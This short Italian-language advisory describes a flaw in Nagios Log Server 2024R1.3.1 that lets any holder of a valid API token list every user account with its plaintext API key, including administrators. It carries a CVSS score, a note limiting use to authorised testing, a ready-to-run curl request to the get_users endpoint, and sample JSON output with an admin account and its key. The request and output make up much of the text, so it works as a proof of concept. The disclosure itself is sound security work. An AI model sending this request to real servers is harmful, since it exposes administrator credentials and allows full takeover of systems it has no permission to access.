
Esposizione di chiavi API autenticate in Nagios Log Server 2024R1.3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:HSolo per ricerca e test autorizzati. Non utilizzarlo contro sistemi senza autorizzazione.
Una vulnerabilità a livello API in Nagios Log Server 2024R1.3.1 consente a qualsiasi utente in possesso di un token API valido di recuperare l'elenco completo degli account utente insieme alle relative chiavi API in chiaro, incluse le credenziali di amministratore. Questa falla consente l'enumerazione degli utenti, l'escalation dei privilegi e la piena compromissione del sistema tramite l'uso non autorizzato dei token esposti.
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
[
{
"name": "devadmin",
"username": "devadmin",
"email": "[email protected]",
"apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
"auth_type": "admin",
...
}
]